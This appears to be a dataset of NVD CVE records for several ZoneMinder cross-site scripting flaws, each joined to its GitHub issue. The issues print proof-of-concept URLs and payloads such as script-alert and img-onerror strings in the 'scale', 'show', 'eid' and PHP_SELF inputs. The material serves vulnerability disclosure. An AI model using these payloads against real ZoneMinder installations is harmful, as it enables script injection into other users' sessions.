"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2447"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2447 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `frame`, insecurely prints the `scale` parameter value on the webpage without applying any proper filtration, leading to reflected XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=frame&eid=2&fid=99&scale=<script>alert('1');</script>
Payload used - `<script>alert('1');</script>`
- Navigate to the Affected URL, Payload would be triggered.
<img width="553" alt="frame" src="https://user-images.githubusercontent.com/47003572/51702809-c3ff6f00-203a-11e9-80cc-6ff31184bde6.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Reflected Cross Site Scripting(XSS) - frame.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2447/comments | 0 | 2019-01-24T19:18:03Z | 2019-02-09T23:11:58Z | https://github.com/ZoneMinder/zoneminder/issues/2447 | 402,856,994 | 2,447 |
CVE-2019-7328 | 2019-02-04T19:29:00.523 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'scale' parameter value in the view frame (frame.php) via /js/frame.js.php because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2449"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2449 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `frame`, insecurely prints the `scale` parameter value on the webpage that is without applying any proper filtration, leading to XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=frame&eid=1&fid=1&scale=</script>"><img src=x onerror=prompt('1');>
Payload used - `</script>"><img src=x onerror=prompt('1');>`
- Navigate to the Affected URL, Payload would be triggered.
Affected source Files:
/web/skins/classic/views/frame.php
/web/skins/classic/views/js/frame.js.php
<img width="456" alt="frame 3" src="https://user-images.githubusercontent.com/47003572/51703300-02495e00-203c-11e9-911d-09bd7188b4f6.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Reflected Cross Site Scripting(XSS) - frame.php (3) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2449/comments | 0 | 2019-01-24T19:26:47Z | 2019-02-09T23:11:58Z | https://github.com/ZoneMinder/zoneminder/issues/2449 | 402,860,291 | 2,449 |
CVE-2019-7329 | 2019-02-04T19:29:00.570 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, as the form action on multiple views utilizes $_SERVER['PHP_SELF'] insecurely, mishandling any arbitrary input appended to the webroot URL, without any proper filtration, leading to XSS. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2446"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2446 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The form action on the multiple views utilizes `$_SERVER['PHP_SELF'];` insecurely. Any arbitrary input appended to the webroot URL, without any proper filtration would lead to an reflected XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php/"><img src=x onerror=prompt('1');>?view=monitor
Payload used - `"><img src=x onerror=prompt('1');>`
- Navigate to the Affected URL, Payload would be triggered.
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Reflected Cross Site Scripting (XSS) - Multiple ($_SERVER['PHP_SELF']) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2446/comments | 0 | 2019-01-24T19:14:11Z | 2019-02-10T06:12:59Z | https://github.com/ZoneMinder/zoneminder/issues/2446 | 402,855,606 | 2,446 |
CVE-2019-7330 | 2019-02-04T19:29:00.600 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'show' parameter value in the view frame (frame.php) because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2448"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2448 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `frame`, insecurely prints the `show` parameter value on the webpage without applying any proper filtration, leading to reflected XSS.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=frame&eid=2&fid=99&scale=test&show=<script>alert('1');</script>
Payload used - `"><img src=x onerror=prompt('1');>`
- Navigate to the Affected URL(with valid fid,eid), Payload would be triggered.
<img width="519" alt="frame 1" src="https://user-images.githubusercontent.com/47003572/51703093-78999080-203b-11e9-8888-25533cb2d9f7.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Reflected Cross Site Scripting(XSS) - frame.php (2) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2448/comments | 0 | 2019-01-24T19:22:37Z | 2019-02-09T23:11:57Z | https://github.com/ZoneMinder/zoneminder/issues/2448 | 402,858,733 | 2,448 |
CVE-2019-7331 | 2019-02-04T19:29:00.647 | Self - Stored Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3 while editing an existing monitor field named "signal check color" (monitor.php). There exists no input validation or output filtration, leaving it vulnerable to HTML Injection and an XSS attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2451"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2451 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
A user can edit an existing monitor thereby modifying various misc properties, one of them being `signal check color`. There exists no input validation & output filtration, leaving it vulnerable to HTML Injection, XSS attack.
**To Reproduce**
Affected URL :
http://localhost/zm/index.php?view=monitor&tab=misc
Payload used - `"><a href="javascript:alert('1')`
- Navigate to the Affected URL & modify the Signal check Color field with the provided payload & click on save.
- Click on the color box, XSS would be triggered.
<img width="314" alt="colour" src="https://user-images.githubusercontent.com/47003572/51703995-ea72d980-203d-11e9-96a2-3cdd824b32be.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Self - Stored Cross Site Scripting (XSS) - monitor.php | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2451/comments | 0 | 2019-01-24T19:40:22Z | 2019-02-10T00:43:25Z | https://github.com/ZoneMinder/zoneminder/issues/2451 | 402,865,181 | 2,451 |
CVE-2019-7332 | 2019-02-04T19:29:00.693 | Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'eid' (aka Event ID) parameter value in the view download (download.php) because proper filtration is omitted. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2442"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06",
"versionEndExcluding": null,
"versionEndIncluding": "1.32.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2442 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | **Describe Your Environment**
- ZoneMinder v1.33.1
- Installed from - ppa:iconnor/zoneminder-master
**Describe the bug**
The view `download`, while exporting an event file, prints the `eid` (Event ID) on the webpage without applying any proper filtration, leading to an XSS issue.
**To Reproduce**
Affected URL :
[http://localhost/zm/index.php?view=download&eid=<script>alert('1');</script>&exportFile=File&generated=1](http://localhost/zm/index.php?view=download&eid=<script>alert('1');</script>&exportFile=File&generated=1)
Payload used - `<script>alert('1');</script>`
- Navigate to the Affected URL, Payload would be triggered.
<img width="544" alt="download - 2" src="https://user-images.githubusercontent.com/47003572/51695760-d58c4b00-2029-11e9-8c38-65a2cd44a886.png">
**Expected behavior**
- Proper escaping of special characters.
**Debug Logs**
```
None
``` | Reflected Cross Site Scripting (XSS) - download.php (2) | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2442/comments | 0 | 2019-01-24T17:17:24Z | 2019-02-09T09:37:57Z | https://github.com/ZoneMinder/zoneminder/issues/2442 | 402,812,072 | 2,442 |
End of preview. Expand
in Dataset Viewer.
README.md exists but content is empty.
Use the Edit dataset card button to edit it.
- Downloads last month
- 35